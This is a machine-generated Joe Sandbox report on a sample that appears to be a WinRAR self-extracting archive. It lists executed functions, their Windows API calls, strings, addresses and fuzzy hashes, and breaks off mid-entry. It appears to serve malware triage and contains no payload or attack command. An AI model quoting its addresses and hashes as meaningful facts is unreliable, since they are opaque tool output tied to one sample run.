API calls 25156->25157 25157->24860 25158->24862 25159->24863 25160->24881 25161->24881 25162->24881 25163->24881 25164->24895 25165->24901 25166->24891 25173 365b48 25167->25173 25169 365c6c 25169->25124 25171 365b48 2 API calls 25171->25169 25172->25124 25174 365b52 25173->25174 25176 365c3a 25174->25176 25177 36b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25174->25177 25176->25169 25176->25171 25177->25174 25178->25132 25179->25129 25180->25137 25181->25135 25183->24909 25185 36a6a8 25184->25185 25186 36a727 FindNextFileW 25185->25186 25187 36a6c1 FindFirstFileW 25185->25187 25188 36a709 25186->25188 25190 36a732 GetLastError 25186->25190 25187->25188 25189 36a6d0 25187->25189 25188->24761 25191 36bb03 GetCurrentDirectoryW 25189->25191 25190->25188 25192 36a6e0 25191->25192 25193 36a6e4 FindFirstFileW 25192->25193 25194 36a6fe GetLastError 25192->25194 25193->25188 25193->25194 25194->25188 25195->24567 25196->24571 25197->24571 25198->24574 25199->24582 25201 369f42 78 API calls 25200->25201 25202 361fe8 25201->25202 25203 361a04 101 API calls 25202->25203 25206 362005 25202->25206 25204 361ff5 25203->25204 25204->25206 25207 36138b 74 API calls 25204->25207 25206->24590 25206->24591 25207->25206 25209 37b583 GetMessageW 25208->25209 25210 37b5bc GetDlgItem 25208->25210 25211 37b599 IsDialogMessageW 25209->25211 25212 37b5a8 TranslateMessage DispatchMessageW 25209->25212 25210->24601 25210->24602 25211->25210 25211->25212 25212->25210 25213 3613e1 84 API calls 2 library calls 25350 3794e0 GetClientRect 25375 3721e0 26 API calls std::bad_exception::bad_exception 25388 37f2e0 46 API calls __RTC_Initialize 25389 38bee0 GetCommandLineA GetCommandLineW 25376 36f1e8 FreeLibrary 25220 37e2d7 25221 37e1db 25220->25221 25222 37e85d ___delayLoadHelper2@8 14 API calls 25221->25222 25222->25221 25390 380ada 51 API calls 2 library calls 25224 3610d5 25229 365abd 25224->25229 25230 365ac7 __EH_prolog 25229->25230 25231 36b505 84 API calls 25230->25231 25232 365ad3 25231->25232 25236 365cac GetCurrentProcess GetProcessAffinityMask 25232->25236 25351 37f4d3 20 API calls 25237 37e1d1 14 API calls ___delayLoadHelper2@8 25412 38a3d0 21 API calls 2 library calls 25413 392bd0 VariantClear 25304 37dec2 25305 37decf 25304->25305 25306 36e617 53 API calls 25305->25306 25307 37dedc 25306->25307 25308 364092 _swprintf 51 API calls 25307->25308 25309 37def1 SetDlgItemTextW 25308->25309 25310 37b568 5 API calls 25309->25310 25311 37df0e 25310->25311 25378 37b5c0 100 API calls 25414 3777c0 118 API calls 25415 37ffc0 RaiseException _com_error::_com_error CallUnexpected 25393 3762ca 123 API calls __InternalCxxFrameHandler

                                                                                        Executed Functions

                                                                                        Function 0037DF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195filesleeptimeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00370863: GetModuleHandleW.KERNEL32(kernel32), ref: 0037087C
                                                                                          • Part of subcall function 00370863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0037088E
                                                                                          • Part of subcall function 00370863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003708BF
                                                                                          • Part of subcall function 0037A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0037A655
                                                                                          • Part of subcall function 0037AC16: OleInitialize.OLE32(00000000), ref: 0037AC2F
                                                                                          • Part of subcall function 0037AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0037AC66
                                                                                          • Part of subcall function 0037AC16: SHGetMalloc.SHELL32(003A8438), ref: 0037AC70
                                                                                        • GetCommandLineW.KERNEL32 ref: 0037DF5C
                                                                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0037DF83
                                                                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0037DF94
                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0037DFCE
                                                                                          • Part of subcall function 0037DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0037DBF4
                                                                                          • Part of subcall function 0037DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0037DC30
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0037DFD7
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,003BEC90,00000800), ref: 0037DFF2
                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxname,003BEC90), ref: 0037DFFE
                                                                                        • GetLocalTime.KERNEL32(?), ref: 0037E009
                                                                                        • _swprintf.LIBCMT ref: 0037E048
                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0037E05A
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0037E061
                                                                                        • LoadIconW.USER32(00000000,00000064), ref: 0037E078
                                                                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0037E0C9
                                                                                        • Sleep.KERNEL32(?), ref: 0037E0F7
                                                                                        • DeleteObject.GDI32 ref: 0037E130
                                                                                        • DeleteObject.GDI32(?), ref: 0037E140
                                                                                        • CloseHandle.KERNEL32 ref: 0037E183
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz;
                                                                                        • API String ID: 3049964643-3846469982
                                                                                        • Opcode ID: 799249aa5e2568a8abb7bd7d09d47323709e5da2cc5665c7999cf700022ffeec
                                                                                        • Instruction ID: 64f41ccc6fbc8af45d81688b1888e4b58f0504ab80edae51e2654ccd8e9cfd0b
                                                                                        • Opcode Fuzzy Hash: 799249aa5e2568a8abb7bd7d09d47323709e5da2cc5665c7999cf700022ffeec
                                                                                        • Instruction Fuzzy Hash: A361E771904245AFD333EB75DC4AF6B7BACEF49704F00442AF609962A1DB7C9944CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037A6C2 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100memorywindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 888 37a6c2-37a6df FindResourceW 889 37a6e5-37a6f6 SizeofResource 888->889 890 37a7db 888->890 889->890 892 37a6fc-37a70b LoadResource 889->892 891 37a7dd-37a7e1 890->891 892->890 893 37a711-37a71c LockResource 892->893 893->890 894 37a722-37a737 GlobalAlloc 893->894 895 37a7d3-37a7d9 894->895 896 37a73d-37a746 GlobalLock 894->896 895->891 897 37a7cc-37a7cd GlobalFree 896->897 898 37a74c-37a76a call 380320 896->898 897->895 902 37a7c5-37a7c6 GlobalUnlock 898->902 903 37a76c-37a78e call 37a626 898->903 902->897 903->902 908 37a790-37a798 903->908 909 37a7b3-37a7c1 908->909 910 37a79a-37a7ae GdipCreateHBITMAPFromBitmap 908->910 909->902 910->909 911 37a7b0 910->911 911->909
                                                                                        APIs
                                                                                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0037B73D,00000066), ref: 0037A6D5
                                                                                        • SizeofResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A6EC
                                                                                        • LoadResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A703
                                                                                        • LockResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A712
                                                                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0037B73D,00000066), ref: 0037A72D
                                                                                        • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0037B73D,00000066), ref: 0037A73E
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0037A7C6
                                                                                          • Part of subcall function 0037A626: GdipAlloc.GDIPLUS(00000010), ref: 0037A62C
                                                                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0037A7A7
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0037A7CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                        • String ID: Fjun7$PNG
                                                                                        • API String ID: 541704414-2849507817
                                                                                        • Opcode ID: 1863521c5d82f72862ab62193b2e3dd0c74f06f6a34ef5491a0fc5593ca96d8b
                                                                                        • Instruction ID: 0ae87bb18b19c4718af96f0b6b67185bb12a14f5b5cb6c97da6bb15da91f8f5e
                                                                                        • Opcode Fuzzy Hash: 1863521c5d82f72862ab62193b2e3dd0c74f06f6a34ef5491a0fc5593ca96d8b
                                                                                        • Instruction Fuzzy Hash: E331B5B5500742BFC726AF61DC48D1FBBBCEF84750F054519F90992620EB36DC44CA52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1032 36a69b-36a6bf call 37ec50 1035 36a727-36a730 FindNextFileW 1032->1035 1036 36a6c1-36a6ce FindFirstFileW 1032->1036 1037 36a742-36a7ff call 370602 call 36c310 call 3715da * 3 1035->1037 1039 36a732-36a740 GetLastError 1035->1039 1036->1037 1038 36a6d0-36a6e2 call 36bb03 1036->1038 1045 36a804-36a811 1037->1045 1047 36a6e4-36a6fc FindFirstFileW 1038->1047 1048 36a6fe-36a707 GetLastError 1038->1048 1042 36a719-36a722 1039->1042 1042->1045 1047->1037 1047->1048 1050 36a717 1048->1050 1051 36a709-36a70c 1048->1051 1050->1042 1051->1050 1053 36a70e-36a711 1051->1053 1053->1050 1055 36a713-36a715 1053->1055 1055->1042
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6C4
                                                                                          • Part of subcall function 0036BB03: _wcslen.LIBCMT ref: 0036BB27
                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6F2
                                                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6FE
                                                                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A728
                                                                                        • GetLastError.KERNEL32(?,?,?,?,0036A592,000000FF,?,?), ref: 0036A734
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 42610566-0
                                                                                        • Opcode ID: e4dfd870ada6b8613ae315fe5ebdc05a7e372467edbc86006fba10ebd5d46aad
                                                                                        • Instruction ID: 4105d1c71d124da5cfed7a17293c72a5ddd74ea7caa6c97a9b8c8056d6c19af5
                                                                                        • Opcode Fuzzy Hash: e4dfd870ada6b8613ae315fe5ebdc05a7e372467edbc86006fba10ebd5d46aad
                                                                                        • Instruction Fuzzy Hash: CE415276900515ABCB26DF68CC84AEAB7B8FB48350F148296F55EE3240D7346E94CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00387DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(?,?,00387DC4,?,0039C300,0000000C,00387F1B,?,00000002,00000000), ref: 00387E0F
                                                                                        • TerminateProcess.KERNEL32(00000000,?,00387DC4,?,0039C300,0000000C,00387F1B,?,00000002,00000000), ref: 00387E16
                                                                                        • ExitProcess.KERNEL32 ref: 00387E28
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1703294689-0
                                                                                        • Opcode ID: fc99b9f7c487db6621a876b2456ac515fb89d12440e9f4601282ba917814664e
                                                                                        • Instruction ID: c11fc66639e3f387ff8ef6253576152f6d8561cf6c507d664bafeb477e361507
                                                                                        • Opcode Fuzzy Hash: fc99b9f7c487db6621a876b2456ac515fb89d12440e9f4601282ba917814664e
                                                                                        • Instruction Fuzzy Hash: 73E0BF71004244ABCF137F54DD0998A7F6AEB50341F114495F8198A232CB36EE51CB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: b8ddba661de9c471bfa8a89bbe35a0568777720e6ed7b6759018c223f41d7647
                                                                                        • Instruction ID: 88a6c44eb24b1c1c7872f82ed1df1354f7c8d14a71c94771b41b06c1fcab9899
                                                                                        • Opcode Fuzzy Hash: b8ddba661de9c471bfa8a89bbe35a0568777720e6ed7b6759018c223f41d7647
                                                                                        • Instruction Fuzzy Hash: 6F820C70904145AEDF17DF64C895BFABBB9BF09300F09C2BAD9499F14ADB315A84CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00376CDC Relevance: .3, Instructions: 343COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: fbe90de6fb6d4d4452b0ce20e6cb9eab6be97ac3fb01568ab6f7219ce8802939
                                                                                        • Instruction ID: c50022afca3cb80faf81fc769043b4e1fa87ac960c36e09b86b8cdfe295d1514
                                                                                        • Opcode Fuzzy Hash: fbe90de6fb6d4d4452b0ce20e6cb9eab6be97ac3fb01568ab6f7219ce8802939
                                                                                        • Instruction Fuzzy Hash: BBD1F4716087408FDB35CF28C85175BBBE0BF89308F09856DE88D9B642D778E909CB56
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037B7E0 Relevance: 109.2, APIs: 48, Strings: 14, Instructions: 731windowfilesleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 0037B7E5
                                                                                          • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                          • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037B8D1
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B8EF
                                                                                        • IsDialogMessageW.USER32(?,?), ref: 0037B902
                                                                                        • TranslateMessage.USER32(?), ref: 0037B910
                                                                                        • DispatchMessageW.USER32(?), ref: 0037B91A
                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0037B93D
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0037B960
                                                                                        • GetDlgItem.USER32(?,00000068), ref: 0037B983
                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0037B99E
                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,003935F4), ref: 0037B9B1
                                                                                          • Part of subcall function 0037D453: _wcschr.LIBVCRUNTIME ref: 0037D45C
                                                                                          • Part of subcall function 0037D453: _wcslen.LIBCMT ref: 0037D47D
                                                                                        • SetFocus.USER32(00000000), ref: 0037B9B8
                                                                                        • _swprintf.LIBCMT ref: 0037BA24
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                          • Part of subcall function 0037D4D4: GetDlgItem.USER32(00000068,003BFCB8), ref: 0037D4E8
                                                                                          • Part of subcall function 0037D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0037AF07,00000001,?,?,0037B7B9,0039506C,003BFCB8,003BFCB8,00001000,00000000,00000000), ref: 0037D510
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0037D51B
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000C2,00000000,003935F4), ref: 0037D529
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037D53F
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0037D559
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037D59D
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0037D5AB
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037D5BA
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037D5E1
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000C2,00000000,003943F4), ref: 0037D5F0
                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0037BA68
                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0037BA90
                                                                                        • GetTickCount.KERNEL32 ref: 0037BAAE
                                                                                        • _swprintf.LIBCMT ref: 0037BAC2
                                                                                        • GetLastError.KERNEL32(?,00000011), ref: 0037BAF4
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0037BB43
                                                                                        • _swprintf.LIBCMT ref: 0037BB7C
                                                                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0037BBD0
                                                                                        • GetCommandLineW.KERNEL32 ref: 0037BBEA
                                                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0037BC47
                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 0037BC6F
                                                                                        • Sleep.KERNEL32(00000064), ref: 0037BCB9
                                                                                        • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0037BCE2
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0037BCEB
                                                                                        • _swprintf.LIBCMT ref: 0037BD1E
                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037BD7D
                                                                                        • SetDlgItemTextW.USER32(?,00000065,003935F4), ref: 0037BD94
                                                                                        • GetDlgItem.USER32(?,00000065), ref: 0037BD9D
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0037BDAC
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0037BDBB
                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037BE68
                                                                                        • _wcslen.LIBCMT ref: 0037BEBE
                                                                                        • _swprintf.LIBCMT ref: 0037BEE8
                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 0037BF32
                                                                                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0037BF4C
                                                                                        • GetDlgItem.USER32(?,00000068), ref: 0037BF55
                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0037BF6B
                                                                                        • GetDlgItem.USER32(?,00000066), ref: 0037BF85
                                                                                        • SetWindowTextW.USER32(00000000,003AA472), ref: 0037BFA7
                                                                                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0037C007
                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037C01A
                                                                                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0037C0BD
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 0037C197
                                                                                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0037C1D9
                                                                                          • Part of subcall function 0037C73F: __EH_prolog.LIBCMT ref: 0037C744
                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037C1FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                        • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<7$STARTDLG$^7$__tmp_rar_sfx_access_check_%u$h7$winrarsfxmappingfile.tmp$Q9
                                                                                        • API String ID: 3829768659-323668307
                                                                                        • Opcode ID: 21991e7c6e264eb7c0be7f2e1aa7e3f19b4c8244087bdece1e6280a7ec1a6388
                                                                                        • Instruction ID: 53649dc89d40add5bffb0df94f90567610c9d24bc83108ed043cb3b3b86269d6
                                                                                        • Opcode Fuzzy Hash: 21991e7c6e264eb7c0be7f2e1aa7e3f19b4c8244087bdece1e6280a7ec1a6388
                                                                                        • Instruction Fuzzy Hash: 4942D671944244BEEB33AB64DC4AFBE7B7CAB06704F04C159F649AA1D2CB785E44CB21
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00370863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
